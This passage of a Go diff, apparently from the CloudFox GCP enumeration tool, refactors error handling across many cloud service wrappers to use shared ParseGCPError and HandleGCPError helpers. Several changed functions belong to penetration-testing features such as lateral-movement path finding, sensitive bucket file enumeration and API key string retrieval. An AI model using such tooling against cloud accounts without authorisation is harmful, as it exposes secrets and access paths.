append(identityBody, []string{"Role Bindings", "0"}) } // Add extended info to identity table diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index d58815be..a472eaab 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -187,9 +187,8 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s gkeSvc := gkeservice.New() clusters, _, err := gkeSvc.Clusters(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not enumerate GKE clusters in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) } var clusterInfos []ClusterWorkloadIdentity @@ -233,9 +232,8 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s // Get Workload Identity Pools pools, err := wiSvc.ListWorkloadIdentityPools(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Workload Identity Pools in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) } var providers []workloadidentityservice.WorkloadIdentityProvider @@ -244,9 +242,8 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s for _, pool := range pools { poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list providers for pool %s: %v", pool.PoolID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) continue } providers = append(providers, poolProviders...) @@ -255,9 +252,8 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s // Find federated identity bindings fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not find federated identity bindings in project %s: %v", projectID, err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) } // Thread-safe append @@ -300,7 +296,8 @@ func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Contex iamSvc := IAMService.New() serviceAccounts, err := iamSvc.ServiceAccounts(projectID) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list service accounts: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list service accounts in project %s", projectID)) return bindings } @@ -886,7 +883,8 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna output, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") } } diff --git a/gcp/services/accessPolicyService/accessPolicyService.go b/gcp/services/accessPolicyService/accessPolicyService.go index 8403fb07..94679471 100644 --- a/gcp/services/accessPolicyService/accessPolicyService.go +++ b/gcp/services/accessPolicyService/accessPolicyService.go @@ -79,7 +79,7 @@ func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, service, err = accesscontextmanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } var allLevels []AccessLevelInfo @@ -105,7 +105,7 @@ func (s *AccessPolicyService) ListAccessLevels(orgID string) ([]AccessLevelInfo, return nil }) if err != nil { - return nil, fmt.Errorf("failed to list access policies: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } return allLevels, nil @@ -123,7 +123,7 @@ func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]Ac service, err = accesscontextmanager.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Access Context Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } var levels []AccessLevelInfo @@ -138,7 +138,7 @@ func (s *AccessPolicyService) ListAccessLevelsForPolicy(policyName string) ([]Ac return nil }) if err != nil { - return nil, fmt.Errorf("failed to list access levels: %v", err) + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") } return levels, nil diff --git a/gcp/services/apikeysService/apikeysService.go b/gcp/services/apikeysService/apikeysService.go index 4e5ed1f6..044417c3 100644 --- a/gcp/services/apikeysService/apikeysService.go +++ b/gcp/services/apikeysService/apikeysService.go @@ -76,7 +76,7 @@ func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { service, err = apikeys.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create API Keys service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } var keys []APIKeyInfo @@ -91,7 +91,7 @@ func (s *APIKeysService) ListAPIKeys(projectID string) ([]APIKeyInfo, error) { return nil }) if err != nil { - return nil, fmt.Errorf("failed to list API keys: %v", err) + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } return keys, nil @@ -109,12 +109,12 @@ func (s *APIKeysService) GetAPIKey(keyName string) (*APIKeyInfo, error) { service, err = apikeys.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create API Keys service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } key, err := service.Projects.Locations.Keys.Get(keyName).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to get API key: %v", err) + return nil, gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } // Extract project ID from key name @@ -141,12 +141,12 @@ func (s *APIKeysService) GetKeyString(keyName string) (string, error) { service, err = apikeys.NewService(ctx) } if err != nil { - return "", fmt.Errorf("failed to create API Keys service: %v", err) + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } resp, err := service.Projects.Locations.Keys.GetKeyString(keyName).Context(ctx).Do() if err != nil { - return "", fmt.Errorf("failed to get key string: %v", err) + return "", gcpinternal.ParseGCPError(err, "apikeys.googleapis.com") } return resp.KeyString, nil diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 3018e319..9ecf193a 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -53,7 +53,7 @@ func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, client, err = artifactregistry.NewClient(ctx) } if err != nil { - return ArtifactRegistryService{}, fmt.Errorf("failed to create artifact registry client: %v", err) + return ArtifactRegistryService{}, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } ars := ArtifactRegistryService{ @@ -87,7 +87,7 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Retrieve repositories. repos, err := ars.Repositories(projectID) if err != nil { - return combinedInfo, fmt.Errorf("failed to retrieve repositories: %v", err) + return combinedInfo, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } combinedInfo.Repositories = repos @@ -259,7 +259,7 @@ func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, // Fetch repository details to determine its format repo, err := ars.Client.GetRepository(ctx, &artifactregistrypb.GetRepositoryRequest{Name: repoFullName}) if err != nil { - return nil, fmt.Errorf("failed to get repository details: %v", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } // Handle different repository formats @@ -379,7 +379,7 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string break } if err != nil { - return nil, fmt.Errorf("failed to list locations: %w", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } locations = append(locations, loc.LocationId) } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go index 0d096652..62fe1bb4 100644 --- a/gcp/services/assetService/assetService.go +++ b/gcp/services/assetService/assetService.go @@ -86,7 +86,7 @@ func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]Asse client, err = asset.NewClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } defer client.Close() @@ -110,7 +110,7 @@ func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]Asse break } if err != nil { - return nil, fmt.Errorf("failed to iterate assets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } info := s.parseAsset(assetResult, projectID) @@ -132,7 +132,7 @@ func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) client, err = asset.NewClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } defer client.Close() @@ -156,7 +156,7 @@ func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) break } if err != nil { - return nil, fmt.Errorf("failed to iterate assets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } info := s.parseAssetWithIAM(assetResult, projectID) @@ -178,7 +178,7 @@ func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, e client, err = asset.NewClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } defer client.Close() @@ -198,7 +198,7 @@ func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, e break } if err != nil { - return nil, fmt.Errorf("failed to iterate assets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } counts[assetResult.AssetType]++ @@ -227,7 +227,7 @@ func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetIn client, err = asset.NewClient(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Asset Inventory client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } defer client.Close() @@ -245,7 +245,7 @@ func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetIn break } if err != nil { - return nil, fmt.Errorf("failed to search resources: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") } info := AssetInfo{ diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go index 5fc2ba19..a29b8736 100644 --- a/gcp/services/beyondcorpService/beyondcorpService.go +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -65,7 +65,7 @@ func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorI service, err = beyondcorp.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create BeyondCorp service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } var connectors []AppConnectorInfo @@ -81,8 +81,7 @@ func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorI return nil }) if err != nil { - // API might not be enabled - return connectors, nil + return connectors, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } return connectors, nil @@ -100,7 +99,7 @@ func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectio service, err = beyondcorp.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create BeyondCorp service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } var connections []AppConnectionInfo @@ -115,7 +114,7 @@ func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectio return nil }) if err != nil { - return connections, nil + return connections, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") } return connections, nil diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 1dc2a89b..2e7704d7 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -148,7 +148,7 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset client, err = bigquery.NewClient(ctx, projectID) } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -160,11 +160,11 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := ds.Metadata(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } dataset := BigqueryDataset{ @@ -298,7 +298,7 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ client, err = bigquery.NewClient(ctx, projectID) } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -311,11 +311,11 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := table.Metadata(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } tbl := BigqueryTable{ diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go index fbcceb32..a413ad2f 100644 --- a/gcp/services/bigtableService/bigtableService.go +++ b/gcp/services/bigtableService/bigtableService.go @@ -38,7 +38,7 @@ func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInf ctx := context.Background() service, err := bigtableadmin.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Bigtable Admin service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") } var instances []BigtableInstanceInfo @@ -46,7 +46,7 @@ func (s *BigtableService) ListInstances(projectID string) ([]BigtableInstanceInf resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") } for _, instance := range resp.Instances { diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index d33d3210..a737988b 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -129,7 +129,7 @@ func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID storageService, err = storage.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create storage service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } var sensitiveFiles []SensitiveFileInfo @@ -152,7 +152,7 @@ func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID }) if err != nil && err != iterator.Done { - return nil, fmt.Errorf("failed to list objects: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } return sensitiveFiles, nil @@ -260,7 +260,7 @@ func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { storageService, err = storage.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create storage service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } var buckets []string @@ -271,7 +271,7 @@ func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { return nil }) if err != nil { - return nil, fmt.Errorf("failed to list buckets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") } return buckets, nil diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go index 1be87a2d..5cc3f034 100644 --- a/gcp/services/certManagerService/certManagerService.go +++ b/gcp/services/certManagerService/certManagerService.go @@ -6,6 +6,7 @@ import ( "strings" "time" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" certificatemanager "google.golang.org/api/certificatemanager/v1" compute "google.golang.org/api/compute/v1" ) @@ -61,7 +62,7 @@ func (s *CertManagerService) GetCertificates(projectID string) ([]Certificate, e ctx := context.Background() service, err := certificatemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create certificate manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") } var certificates []Certificate @@ -119,7 +120,7 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var certificates []SSLCertificate @@ -127,7 +128,7 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific // Global SSL certificates resp, err := service.SslCertificates.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list SSL certificates: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, cert := range resp.Items { @@ -203,7 +204,7 @@ func (s *CertManagerService) GetCertificateMaps(projectID string) ([]Certificate ctx := context.Background() service, err := certificatemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create certificate manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "certificatemanager.googleapis.com") } var maps []CertificateMap diff --git a/gcp/services/cloudArmorService/cloudArmorService.go b/gcp/services/cloudArmorService/cloudArmorService.go index 0892e550..9f4adb75 100644 --- a/gcp/services/cloudArmorService/cloudArmorService.go +++ b/gcp/services/cloudArmorService/cloudArmorService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" compute "google.golang.org/api/compute/v1" ) @@ -52,7 +53,7 @@ func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPol ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var policies []SecurityPolicy @@ -60,7 +61,7 @@ func (s *CloudArmorService) GetSecurityPolicies(projectID string) ([]SecurityPol // List security policies resp, err := service.SecurityPolicies.List(projectID).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to list security policies: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, policy := range resp.Items { @@ -265,7 +266,7 @@ func (s *CloudArmorService) GetUnprotectedLoadBalancers(projectID string) ([]str ctx := context.Background() service, err := compute.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create compute service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var unprotected []string diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go index 278a10e2..2eeddef4 100644 --- a/gcp/services/cloudbuildService/cloudbuildService.go +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -102,7 +102,7 @@ func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error service, err = cloudbuild.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Cloud Build service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } var triggers []TriggerInfo @@ -127,7 +127,7 @@ func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error return nil }) if err2 != nil { - return nil, fmt.Errorf("failed to list triggers: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } } @@ -146,7 +146,7 @@ func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildIn service, err = cloudbuild.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Cloud Build service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } var builds []BuildInfo @@ -159,7 +159,7 @@ func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildIn req2 := service.Projects.Builds.List(projectID).PageSize(limit) resp, err = req2.Do() if err != nil { - return nil, fmt.Errorf("failed to list builds: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") } } diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index 55e459dd..58cd821e 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" run "google.golang.org/api/run/v2" ) @@ -85,7 +86,7 @@ func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { service, err := run.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Run service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } var services []ServiceInfo @@ -110,7 +111,7 @@ func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list services: %v", err) + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } return services, nil @@ -122,7 +123,7 @@ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { service, err := run.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Run service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } var jobs []JobInfo @@ -140,7 +141,7 @@ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { }) if err != nil { - return nil, fmt.Errorf("failed to list jobs: %v", err) + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") } return jobs, nil diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go index 9bdad65b..ea6b6cdc 100644 --- a/gcp/services/cloudsqlService/cloudsqlService.go +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" sqladmin "google.golang.org/api/sqladmin/v1" ) @@ -76,12 +77,12 @@ func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error service, err := sqladmin.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud SQL service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") } resp, err := service.Instances.List(projectID).Do() if err != nil { - return nil, fmt.Errorf("failed to list SQL instances: %v", err) + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") } var instances []SQLInstanceInfo diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index 75b1d9f4..8234f485 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -67,7 +67,7 @@ func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, service, err = composer.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Composer service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") } var environments []EnvironmentInfo @@ -83,7 +83,7 @@ func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, return nil }) if err != nil { - return nil, fmt.Errorf("failed to list Composer environments: %v", err) + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") } return environments, nil diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index e4c91dc4..2a1416ce 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -122,12 +122,12 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf ctx := context.Background() computeService, err := ces.getService(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } regions, err := computeService.Regions.List(projectID).Do() if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } var instanceInfos []ComputeEngineInfo @@ -136,7 +136,7 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf zone := getZoneNameFromURL(zoneURL) instanceList, err := computeService.Instances.List(projectID, zone).Do() if err != nil { - return nil, fmt.Errorf("error retrieving instances from zone %s: %v", zone, err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } for _, instance := range instanceList.Items { info := ComputeEngineInfo{ @@ -418,7 +418,7 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM project, err := computeService.Projects.Get(projectID).Do() if err != nil { - return nil, fmt.Errorf("failed to get project metadata: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } info := &ProjectMetadataInfo{ @@ -501,7 +501,7 @@ func (ces *ComputeEngineService) GetInstanceIAMPolicy(projectID, zone, instanceN policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instanceName).Do() if err != nil { - return nil, fmt.Errorf("failed to get instance IAM policy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } info := &InstanceIAMInfo{ diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go index d04f746b..104322ad 100644 --- a/gcp/services/crossProjectService/crossProjectService.go +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" ) @@ -53,7 +54,7 @@ func (s *CrossProjectService) AnalyzeCrossProjectAccess(projectIDs []string) ([] crmService, err := cloudresourcemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } var crossProjectBindings []CrossProjectBinding @@ -108,12 +109,12 @@ func (s *CrossProjectService) GetCrossProjectServiceAccounts(projectIDs []string iamService, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } crmService, err := cloudresourcemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } var crossProjectSAs []CrossProjectServiceAccount @@ -184,7 +185,7 @@ func (s *CrossProjectService) FindLateralMovementPaths(projectIDs []string) ([]L crmService, err := cloudresourcemanager.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create Cloud Resource Manager service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } var paths []LateralMovementPath diff --git a/gcp/services/customRolesService/customRolesService.go b/gcp/services/customRolesService/customRolesService.go index 9a0589cf..566c86e9 100644 --- a/gcp/services/customRolesService/customRolesService.go +++ b/gcp/services/customRolesService/customRolesService.go @@ -5,6 +5,7 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" iam "google.golang.org/api/iam/v1" ) @@ -107,7 +108,7 @@ func (s *CustomRolesService) ListCustomRoles(projectID string) ([]CustomRoleInfo iamService, err := iam.NewService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create IAM service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } var roles []CustomRoleInfo @@ -142,7 +143,7 @@ func (s *CustomRolesService) ListCustomRoles(projectID string) ([]CustomRoleInfo return nil }) if err != nil { - return nil, fmt.Errorf("failed to list custom roles: %v", err) + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } return roles, nil diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go index 9e94bb40..c7788210 100644 --- a/gcp/services/dataflowService/dataflowService.go +++ b/gcp/services/dataflowService/dataflowService.go @@ -2,7 +2,6 @@ package dataflowservice import ( "context" - "fmt" "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -67,7 +66,7 @@ func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { service, err = dataflow.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Dataflow service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") } var jobs []JobInfo @@ -82,7 +81,7 @@ func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { return nil }) if err != nil { - return nil, fmt.Errorf("failed to list Dataflow jobs: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") } return jobs, nil diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go index f2be3bda..4c2006bc 100644 --- a/gcp/services/dataprocService/dataprocService.go +++ b/gcp/services/dataprocService/dataprocService.go @@ -95,7 +95,7 @@ func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) service, err = dataproc.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Dataproc service: %v", err) + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") } var clusters []ClusterInfo @@ -128,14 +128,14 @@ func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) service, err = dataproc.NewService(ctx) } if err != nil { - return nil, fmt.Errorf("failed to create Dataproc service: %v", err) + return nil, 